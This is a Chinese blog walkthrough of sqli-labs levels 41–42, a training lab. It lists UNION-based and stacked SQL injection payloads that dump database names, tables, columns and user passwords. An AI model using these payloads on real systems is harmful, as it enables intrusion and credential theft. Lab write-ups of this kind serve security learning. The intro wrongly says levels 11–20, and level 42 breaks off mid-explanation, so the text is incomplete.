下面开始11-20关,之前不会的关卡可以参考我这几篇文章: sql-lib闯关秘籍之1-10关,sql-lib闯关秘籍之11-20关,sql-lib闯关秘籍之21-30关, sql-lib闯关秘籍之41-50关
不管是第几关,我们的最终目标是获得用户密码,从而获取最高权限!
以下的学习过程中如果遇到那里不会的或者不清楚的地方,欢迎大家留言,我将尽力帮助大家~
第四十一关
这关和第三十九关一样,只是错误没有回显
获得版本和数据库名 ?id=0 union select 1,version(),database() #
获得表名 ?id=0 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() #
获得列名 ?id=0 union select 1,2,group_concat(column_name) from information_schema.columns where table_name=0x7573657273 #
获取用户名密码 ?id=0 union select 1,group_concat(username),group_concat(password) from security.users where 1 #
也是可以堆叠注入的,堆叠注入语句 ?id=1;create table test41 like users;#
第四十二关
熟悉的界面、
本来想注册,但是好像不能
这一关因为user设置了过滤函数mysqli_real_escape_string()
所以我们在密码处构造
41-50关结束
该文章有参考了以下的网页: